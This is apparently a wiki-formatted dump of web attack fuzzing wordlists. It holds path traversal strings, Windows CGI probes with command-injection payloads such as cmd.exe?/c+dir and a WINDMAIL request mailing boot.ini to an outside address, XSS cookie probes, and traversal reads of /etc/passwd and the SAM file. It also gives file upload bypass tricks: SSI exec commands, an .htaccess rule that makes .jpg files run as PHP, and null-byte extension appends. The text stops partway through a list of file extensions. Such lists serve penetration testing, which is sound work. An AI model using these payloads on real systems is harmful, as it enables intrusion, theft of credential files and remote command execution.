..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI   (Update: 17 March 2010)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010 &lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass   (Update: 17 March 2009 s ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename &amp;lt;pre&amp;gt;Appends  (Update: 17 March 2009  ===&lt;br /&gt;
# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Commonly Writable directories File Upload Filter Bypass - Filename  Appends  (&amp;lt;pre&amp;gt;Update: 17 March 2009  ===&lt;br /&gt;
#Commonly Writable directories File Upload Filter Bypass - Filename Appends  (Update: 17 March 2009 &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2009 - Total Statements: 863 ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2009 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
